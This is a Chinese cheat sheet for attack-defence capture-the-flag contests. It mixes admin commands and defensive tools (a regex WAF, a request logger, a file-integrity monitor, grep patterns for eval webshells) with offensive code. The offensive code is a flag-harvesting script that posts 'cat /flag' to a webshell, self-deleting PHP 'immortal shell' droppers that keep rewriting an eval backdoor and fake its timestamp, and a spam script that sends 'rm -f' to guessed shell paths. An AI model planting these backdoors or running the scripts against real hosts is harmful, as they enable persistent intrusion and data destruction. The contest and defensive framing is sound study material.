常用命令
tar -zcvf web.tar.gz /var/www/html/ 将/var/www/html压缩一份到web.tar.gz
tar -xzvf web.tar.gz 解压web.tar.gz
mysql -uroot -proot #进入数据库,用户名和密码都是root
备份服务器上所有数据库
mysqldump --all-databases > 123.sql
备份指定数据库:
mysqldump -u username -ppassword databasename > bak.sql  (注意:-p 与密码之间不能有空格,或只写 -p 回车后再输入密码)
mysql备份单个数据库命令
mysqldump --column-statistics=0 -h主机ip -P端口号 -u数据库用户名 -p数据库密码 数据库名称 > 想要备份的文件名称.sql
netstat -tuln 查看当前系统上开放的端口和相应的服务
netstat -ano/-a #查看端口情况
lsof -i:端口号 或者 netstat -tunlp|grep 端口号 查看指定端口被那个进程占用
iptables -A INPUT -p tcp --dport <端口号> -j DROP 拒绝该端口的连接请求,即关闭端口
iptables -I INPUT -s ***.***.***.*** -j DROP 封杀ip 如:iptables -I INPUT -s 123.44.55.66 -j DROP
iptables -D INPUT -s ***.***.***.*** -j DROP 解封ip
grep -r "flag" /var/www/html/ #查找默认FLAG
find /var/www/html -name 'flag*.*' # 查找名字为flag的
find /var/www/html -name '*.php' -mmin -20 #查看最近20分钟,在/var/www/html目录下,后缀名为.php的,被修改的文件(通配符需加引号,防止被shell先行展开)
find ./ -name '*.php' | xargs wc -l | sort -n #按行数从小到大排序,寻找行数最短文件(-n 按数值排序)
grep -r --include=*.php '[^a-z]eval($_POST' /var/www/html #查包含关键字的php文件
find /var/www/html -type f -name "*.php" | xargs grep "eval(" |more
批量获取提交flag
import requests
def get_flag():
    """Fetch the flag from every target host (ports 8802-8803) and append
    each response to result.txt.

    Bug fix: the request was unguarded, so a single unreachable host
    raised (timeout=1) and aborted the whole sweep.
    """
    for port in range(8802, 8804):
        url = 'http://121.40.173.182:' + str(port) + '/footer.php'
        data = {
            'shell': 'cat /flag'
        }
        try:
            # Short timeout keeps one dead host from stalling the sweep.
            result = requests.post(url=url, data=data, timeout=1).content.decode('utf-8')
        except requests.RequestException:
            # Skip unreachable hosts instead of crashing the loop.
            continue
        print(result)
        # 'with' closes the file automatically; the old explicit f.close()
        # inside the with-block was redundant.
        with open(r'result.txt', 'a+') as f:
            f.write(result + '\n')
def post_flag():
    """Submit every flag recorded in result.txt to the scoring endpoint.

    Fixes: the file handle was never closed, blank lines were submitted
    as empty flags, the flag was not URL-encoded, and a hung scoring
    server would block forever (no timeout).
    """
    from urllib.parse import quote  # stdlib; encode flags containing special chars
    with open('result.txt') as flags:
        for line in flags:
            flag = line.strip()
            if not flag:
                continue  # skip empty lines
            url = ('http://121.40.173.182:8080/flag_file.php?token=team1&flag='
                   + quote(flag))
            try:
                status = requests.get(url=url, timeout=5).status_code
            except requests.RequestException:
                continue  # scoring server unreachable; try the next flag
            if status == 200:
                print(flag + '提交成功')
if __name__ == '__main__':
    # Collect flags from all targets first, then submit the recorded results.
    get_flag()
    post_flag()
不死马
普通
<?php
// Immortal-shell dropper: keeps running after the client disconnects,
// deletes itself from disk, then endlessly re-creates the backdoor file
// so that deleting the backdoor has no lasting effect.
ignore_user_abort(true);
set_time_limit(0);
unlink(__FILE__);

$target  = '.shell.php';
$payload = '<?php if(md5($_POST["pass"])=="e10adc3949ba59abbe56e057f20f883e"){@eval($_POST[a]);} ?>';

for (;;) {
    file_put_contents($target, $payload);
    usleep(5000);  // rewrite every 5 ms
}
?>
<?php
ignore_user_abort(true); // ignore_user_abort decides whether losing the client connection stops the script: true keeps it running after disconnect, false lets the script die with the connection
set_time_limit(0); // set_time_limit caps run time in seconds (default 30, fatal error on overrun); 0 removes the limit entirely
unlink(__FILE__); // unlink() deletes a file; __FILE__ is this script itself — self-delete so the dropper cannot be found and removed
$file = '.index.php';
$code = '<?php if(md5($_GET["pass"])=="588b0909be46df2e992915a156a4e848"){@eval($_POST[a]);} ?>'; // backdoor source to be written out below
while (1){ // infinite loop
file_put_contents($file,$code); // file_put_contents writes the backdoor string into the target file on every pass
usleep(5000); // usleep suspends the calling thread for the given number of microseconds (1e-6 s) between rewrites
}
?>
高级
<?php
ignore_user_abort(true); // keep running after the client disconnects
set_time_limit(0); // no execution time limit
unlink(__FILE__); // delete this dropper file itself
$file = './.index.php';
$code = '<?php if(md5($_POST["pass"])=="3a50065e1709acc47ba0c9238294364f"){@eval($_POST[a]);} ?>';
// pass=Sn3rtf4ck — backdoor usage: fuckyou.php?pass=Sn3rtf4ck&a=command
while (1){
file_put_contents($file,$code);
system('touch -m -d "2023-10-28 14:00:00" .index.php'); // reset mtime after each rewrite so the file is invisible to mtime-based searches (e.g. find -mmin)
usleep(50000);
}
?>
//touch -d "2023-10-28 14:00:00" .index.php 只修改文件的修改时间,
//这里.index.php的文件时间一直都是2023-10-28 14:00:00了
克制不死马
<?php
// Counter-script: out-race an immortal shell by overwriting its output
// file faster than the shell re-creates it.
ignore_user_abort(true);
set_time_limit(0);
unlink(__FILE__);
$file = 'x.php'; // must be the same file name the immortal shell keeps writing
$code = '干掉不死马,随便写,不写也可以';
while (1){
file_put_contents($file,$code);
usleep(1000); // the immortal shell sleeps 5000 µs; sleeping only 1000 µs means this loop writes faster and keeps replacing its backdoor
}
?>
waf(php)
<!--
require_once('waf.php');
PHPCMS V9 \phpcms\base.php
PHPWIND8.7 \data\sql_config.php
DEDECMS5.7 \data\common.inc.php
DiscuzX2 \config\config_global.php
Wordpress \wp-config.php
Metinfo \include\head.php
-->
<?php
// Drop-in request firewall: include it from the target app's entry point
// (require_once 'waf.php') to scan every GET/POST/COOKIE value against
// common SQL-injection / XSS patterns and abort matching requests.

// Fatal-error handler: print where the error happened, then stop.
function customError($errno, $errstr, $errfile, $errline) {
    echo "<b>Error number:</b> [$errno],error on line $errline in $errfile<br />";
    die();
}
set_error_handler("customError", E_ERROR);

// Per-channel filter patterns (applied case-insensitively, dotall; see DefendAttack).
$getfilter="'|(and|or)\\b.+?(>|<|=|in|like)|\\/\\*.+?\\*\\/|<\\s*script\\b|\\bEXEC\\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\\s+(TABLE|DATABASE)";
$postfilter="\\b(and|or)\\b.{1,6}?(=|>|<|\\bin\\b|\\blike\\b)|\\/\\*.+?\\*\\/|<\\s*script\\b|\\bEXEC\\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\\s+(TABLE|DATABASE)";
// Bug fix: the quantifier here was written "{1.6}", which PCRE treats as a
// literal (the boolean-operator branch never matched); corrected to "{1,6}"
// to mirror the POST filter.
$cookiefilter="\\b(and|or)\\b.{1,6}?(=|>|<|\\bin\\b|\\blike\\b)|\\/\\*.+?\\*\\/|<\\s*script\\b|\\bEXEC\\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\\s+(TABLE|DATABASE)";

// Abort the request when $StrFiltValue matches the pattern $ArrFiltReq.
function DefendAttack($StrFiltKey, $StrFiltValue, $ArrFiltReq) {
    if(is_array($StrFiltValue)) {
        $StrFiltValue = implode($StrFiltValue);  // flatten array parameters before matching
    }
    // /i = case-insensitive, /s = '.' also matches newlines
    if(preg_match("/".$ArrFiltReq."/is", $StrFiltValue)==1) {
        //slog("<br><br>操作IP: ".$_SERVER["REMOTE_ADDR"]."<br>操作时间: ".strftime("%Y-%m-%d %H:%M:%S")."<br>操作页面: ".$_SERVER["PHP_SELF"]."<br>提交方式: ".$_SERVER["REQUEST_METHOD"]."<br>提交参数: ".$StrFiltKey."<br>提交参数: ".$StrFiltValue);
        print "Prohibition operation!";
        exit();
    }
}

//$ArrPGC = array_merge($_GET, $_POST, $_COOKIE);
foreach ($_GET as $key => $value) {
    DefendAttack($key, $value, $getfilter);
}
foreach ($_POST as $key => $value) {
    DefendAttack($key, $value, $postfilter);
}
foreach ($_COOKIE as $key => $value) {
    DefendAttack($key, $value, $cookiefilter);
}
// Removed dead `if (file_exists(filename)) {}` block: `filename` was an
// undefined constant (a fatal error on PHP 8) and the body was empty.

// Append one audit line to <docroot>/tmp/log1.html (used by the commented
// slog() call above).
function slog($logs) {
    $toppath = $_SERVER["DOCUMENT_ROOT"]."/tmp/log1.html";
    $Ts=fopen($toppath, "a+");
    fputs($Ts, $logs."\r\n");
    fclose($Ts);
}
?>
搅屎棍
import requests
import time
def scan_attack():
    """Endlessly spray common webshell paths and payloads at every target port.

    Fixes: requests.post had no timeout, so one unresponsive host could
    hang the loop forever; the path/payload pools were set literals, so
    they were iterated in nondeterministic order — tuples keep the
    listed order.
    """
    files = ('shell.php', 'x.php', 'index.php', 'web.php', '1.php')
    payloads = ('cat /flag', 'ls -al', 'rm -f', 'echo 1')
    while True:
        for port in range(8802, 8804):
            for name in files:
                url = 'http://192.168.76.156:' + str(port) + '/' + name
                for cmd in payloads:
                    data = {
                        'payload': cmd
                    }
                    try:
                        requests.post(url, data=data, timeout=3)
                        print("正在搅屎:" + str(port) + '|' + name + '|' + cmd)
                    except Exception:
                        pass  # best-effort spam: ignore dead hosts/paths
                    time.sleep(0.5)  # throttle either way
if __name__ == '__main__':
    # Runs forever; stop with Ctrl-C.
    scan_attack()
访问历史(日志监控php)
<?php
// Lightweight access logger: records the method/URL, selected request
// headers and the raw POST body of every request into hourly files
// under /tmp (tail -f /tmp/log_<HH> to watch live).
date_default_timezone_set("Asia/Shanghai");

// Polyfill for SAPIs where getallheaders() is missing (e.g. nginx+FPM):
// rebuild the header list from the HTTP_* entries in $_SERVER.
if (!function_exists('getallheaders')) {
    function getallheaders() {
        $headers = [];
        foreach ($_SERVER as $name => $value) {
            if (substr($name, 0, 5) == 'HTTP_') {
                // HTTP_USER_AGENT -> User-Agent
                $headers[str_replace(' ', '-', ucwords(strtolower(str_replace('_', ' ', substr($name, 5)))))] = $value;
            }
        }
        return $headers;
    }
}

// Append one log record for the current request.
function WAF_log() {
    global $WAF_query, $WAF_headers, $WAF_post, $WAF_log;
    $tmp = "[" . date('y-m-d H:i:s') . "]\n";
    $tmp .= "SRC IP: " . $_SERVER["REMOTE_ADDR"]."\n";
    // Bug fix: method and URL were glued together with an empty string
    // (logged as "GEThttp://..."); use a space separator.
    $tmp .= $_SERVER['REQUEST_METHOD'].' '.'http://'.$_SERVER['SERVER_NAME'].':'.$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"]."\n";
    foreach($WAF_headers as $k => $v) {
        // Only headers useful for replaying/attributing a request.
        if($k=='Accept-Encoding'||$k=='Accept-Language'||$k=='Accept'||$k=='User-Agent'||$k=='Referer'||$k=='Cookie'||$k=='X-Forwarded-For')
            $tmp .= $k . ': ' . $v . "\n";
    }
    if (!empty($WAF_post)) {
        $tmp .= "\n". $WAF_post . "\n";
    }
    $tmp .= "\n";
    // One file per hour (log_00..log_23); @ suppresses errors if unwritable.
    @file_put_contents($WAF_log."log_".date("H",time()), $tmp, FILE_APPEND);
}

$WAF_query = $_SERVER['QUERY_STRING'];
$WAF_headers = getallheaders();
$WAF_post = @file_get_contents('php://input'); // raw request body
$WAF_log = '/tmp/';                            // log directory
$WAF_AD_log = '';
WAF_log();
?>
//文件会写在tmp目录,以log_加时间(小时)命名
//使用 tail -f log_20 就能监控了
文件监控
# -*- coding: utf-8 -*-
# File-integrity monitor (Python 2): snapshots and backs up a web root,
# then restores deleted/modified files and quarantines new uploads.
import os
import re
import hashlib
import shutil
import ntpath
import time
import sys
# Force the process default encoding to UTF-8 so writing non-ASCII paths
# to the log never raises UnicodeEncodeError.
# NOTE: reload(sys)/setdefaultencoding exist only on Python 2.
reload(sys)
sys.setdefaultencoding('utf-8')
CWD = os.getcwd()        # directory being guarded (where the script is launched)
FILE_MD5_DICT = {}       # path -> MD5 of the pristine copy
ORIGIN_FILE_LIST = []    # snapshot of file paths present at startup
# Special working-directory names; the MD5 suffixes make collisions with
# real site content unlikely.
Special_path_str = 'drops_B0503373BDA6E3C5CD4E5118C02ED13A' #drops_md5(icecoke1024)
bakstring = 'back_CA7CB46E9223293531C04586F3448350' #bak_md5(icecoke1)
logstring = 'log_8998F445923C88FF441813F0F320962C' #log_md5(icecoke2)
webshellstring = 'webshell_988A15AB87447653EFB4329A90FF45C5'#webshell_md5(icecoke3)
difffile = 'difference_3C95FA5FB01141398896EDAA8D667802' #diff_md5(icecoke4)
Special_string = 'drops_log' # exemption marker: files containing this string are never touched
UNICODE_ENCODING = "utf-8"
INVALID_UNICODE_CHAR_FORMAT = r"\?%02x"  # escape format for undecodable bytes (see getUnicode)
# Absolute paths of the backup / log / webshell-quarantine / diff directories.
spec_base_path = os.path.realpath(os.path.join(CWD, Special_path_str))
Special_path = {
    'bak' : os.path.realpath(os.path.join(spec_base_path, bakstring)),
    'log' : os.path.realpath(os.path.join(spec_base_path, logstring)),
    'webshell' : os.path.realpath(os.path.join(spec_base_path, webshellstring)),
    'difffile' : os.path.realpath(os.path.join(spec_base_path, difffile)),
}
def isListLike(value):
    """Return True when *value* is a list, tuple, or set (or a subclass)."""
    return any(isinstance(value, kind) for kind in (list, tuple, set))
# Best-effort conversion of any value to unicode (Python 2 only: relies on
# unicode/basestring and `except ..., ex` syntax).
def getUnicode(value, encoding=None, noneToNull=False):
    """Convert *value* to a unicode string, escaping undecodable bytes.

    encoding:   preferred charset to try first (falls back to UNICODE_ENCODING)
    noneToNull: map None to NULL instead of converting it
                # NOTE(review): NULL is not defined anywhere in this file, so
                # this branch would raise NameError — confirm intended constant.
    """
    if noneToNull and value is None:
        return NULL
    if isListLike(value):
        # Recurse over the elements, preserving list structure.
        value = list(getUnicode(_, encoding, noneToNull) for _ in value)
        return value
    if isinstance(value, unicode):
        return value  # already unicode
    elif isinstance(value, basestring):
        while True:
            try:
                return unicode(value, encoding or UNICODE_ENCODING)
            except UnicodeDecodeError, ex:
                try:
                    return unicode(value, UNICODE_ENCODING)
                except:
                    # Replace the undecodable byte range with escaped hex
                    # (INVALID_UNICODE_CHAR_FORMAT) and retry the decode.
                    value = value[:ex.start] + "".join(INVALID_UNICODE_CHAR_FORMAT % ord(_) for _ in value[ex.start:ex.end]) + value[ex.end:]
    else:
        # Non-string value: rely on its unicode conversion, ignoring errors.
        try:
            return unicode(value)
        except UnicodeDecodeError:
            return unicode(str(value), errors="ignore")
# Create a directory tree, like `mkdir -p`.
def mkdir_p(path):
    """Create *path* (and parents); silently succeed if it already exists."""
    import errno
    try:
        os.makedirs(path)
    except OSError as exc:
        # Only an "already exists as a directory" error is benign.
        if exc.errno != errno.EEXIST or not os.path.isdir(path):
            raise
# Collect every file path currently under the watched tree.
def getfilelist(cwd):
    """Return all file paths under *cwd*, skipping the special working tree."""
    collected = []
    for base, _subdirs, names in os.walk(cwd):
        collected.extend(
            os.path.join(base, name)
            for name in names
            if Special_path_str not in os.path.join(base, name)
        )
    return collected
# Compute a file's MD5; on failure, treat the file as deleted and restore it.
def calcMD5(filepath):
    """Return the MD5 hex digest of *filepath*.

    If the file cannot be read it is assumed to have been deleted: the
    pristine copy is restored from the backup directory, the module-level
    snapshots are rebuilt, and the event is logged (returns None then).
    """
    # Bug fix: the except path below assigned these module-level snapshots
    # without `global`, so the rebuilt lists were locals and silently
    # discarded.
    global ORIGIN_FILE_LIST, FILE_MD5_DICT
    try:
        # `with` guarantees the handle is closed even if read/update raises.
        with open(filepath, 'rb') as f:
            md5obj = hashlib.md5()
            md5obj.update(f.read())
            return md5obj.hexdigest()
    # An unreadable file is interpreted as "deleted" -> restore it.
    except Exception as e:
        print(u'[*] 文件被删除 : ' + getUnicode(filepath))
        shutil.copyfile(os.path.join(Special_path['bak'], ntpath.basename(filepath)), filepath)
        for value in Special_path:
            mkdir_p(Special_path[value])
        # Rebuild the global snapshots so the restored file is tracked again.
        ORIGIN_FILE_LIST = getfilelist(CWD)
        FILE_MD5_DICT = getfilemd5dict(ORIGIN_FILE_LIST)
        print(u'[+] 被删除文件已恢复!')
        try:
            f = open(os.path.join(Special_path['log'], 'log.txt'), 'a')
            f.write('deleted_file: ' + getUnicode(filepath) + ' 时间: ' + getUnicode(time.ctime()) + '\n')
            f.close()
        except Exception as e:
            # Logging is best-effort; the restore already happened.
            print(u'[-] 记录失败 : 被删除文件: ' + getUnicode(filepath))
# Map every tracked file to its MD5.
def getfilemd5dict(filelist=None):
    """Return {path: md5} for *filelist*, skipping the special working tree.

    Bug fix: the old signature used a mutable default argument
    (filelist=[]); None is now the sentinel for "no files".
    """
    filemd5dict = {}
    for ori_file in (filelist or []):
        if Special_path_str not in ori_file:
            md5 = calcMD5(os.path.realpath(ori_file))
            if md5:  # calcMD5 returns None when the file had to be restored
                filemd5dict[ori_file] = md5
    return filemd5dict
# Copy every tracked file into the backup directory.
def backup_file(filelist=None):
    """Back up each path in *filelist* into Special_path['bak'].

    Bug fix: the old signature used a mutable default argument
    (filelist=[]); None is now the sentinel for "no files".
    """
    for filepath in (filelist or []):
        if Special_path_str not in filepath:
            # copy2 preserves metadata (mtime/permissions) with the content.
            shutil.copy2(filepath, Special_path['bak'])
if __name__ == '__main__':
    print u'---------持续监测文件中------------'
    # Ensure the backup/log/quarantine/diff working directories exist.
    for value in Special_path:
        mkdir_p(Special_path[value])
    # Initial snapshot: all file paths, their MD5s, and a full backup copy.
    ORIGIN_FILE_LIST = getfilelist(CWD)
    FILE_MD5_DICT = getfilemd5dict(ORIGIN_FILE_LIST)
    backup_file(ORIGIN_FILE_LIST)
    print u'[*] 所有文件已备份完毕!'
    while True:
        file_list = getfilelist(CWD)
        # Symmetric difference against the snapshot = newly appeared files.
        diff_file_list = list(set(file_list) ^ set(ORIGIN_FILE_LIST))
        if len(diff_file_list) != 0:
            for filepath in diff_file_list:
                try:
                    f = open(filepath, 'r').read()
                except Exception, e:
                    break
                # Files carrying the exemption marker are left alone.
                if Special_string not in f:
                    try:
                        print u'[*] 查杀疑似WebShell上传文件: ' + getUnicode(filepath)
                        # Quarantine the upload into the webshell dir as .txt.
                        shutil.move(filepath, os.path.join(Special_path['webshell'], ntpath.basename(filepath) + '.txt'))
                        print u'[+] 新上传文件已删除!'
                    except Exception as e:
                        print u'[!] 移动文件失败, "%s" 疑似WebShell,请及时处理.'%getUnicode(filepath)
                    try:
                        f = open(os.path.join(Special_path['log'], 'log.txt'), 'a')
                        f.write('new_file: ' + getUnicode(filepath) + ' 时间: ' + str(time.ctime()) + '\n')
                        f.close()
                    except Exception as e:
                        print u'[-] 记录失败 : 上传文件: ' + getUnicode(e)
        # Restore any tracked file whose MD5 no longer matches the snapshot.
        md5_dict = getfilemd5dict(ORIGIN_FILE_LIST)
        for filekey in md5_dict:
            if md5_dict[filekey] != FILE_MD5_DICT[filekey]:
                try:
                    f = open(filekey, 'r').read()
                except Exception, e:
                    break
                if Special_string not in f:
                    try:
                        print u'[*] 该文件被修改 : ' + getUnicode(filekey)
                        # Move the tampered copy aside, then restore the backup.
                        shutil.move(filekey, os.path.join(Special_path['difffile'], ntpath.basename(filekey) + '.txt'))
                        shutil.copyfile(os.path.join(Special_path['bak'], ntpath.basename(filekey)), filekey)
                        print u'[+] 文件已复原!'
                    except Exception as e:
                        print u'[!] 移动文件失败, "%s" 疑似WebShell,请及时处理.'%getUnicode(filekey)
                    try:
                        f = open(os.path.join(Special_path['log'], 'log.txt'), 'a')
                        f.write('difference_file: ' + getUnicode(filekey) + ' 时间: ' + getUnicode(time.ctime()) + '\n')
                        f.close()
                    except Exception as e:
                        print u'[-] 记录失败 : 被修改文件: ' + getUnicode(filekey)
                        pass
        time.sleep(2)  # poll interval
注:内容来源于网络,如有不满,请联系我删除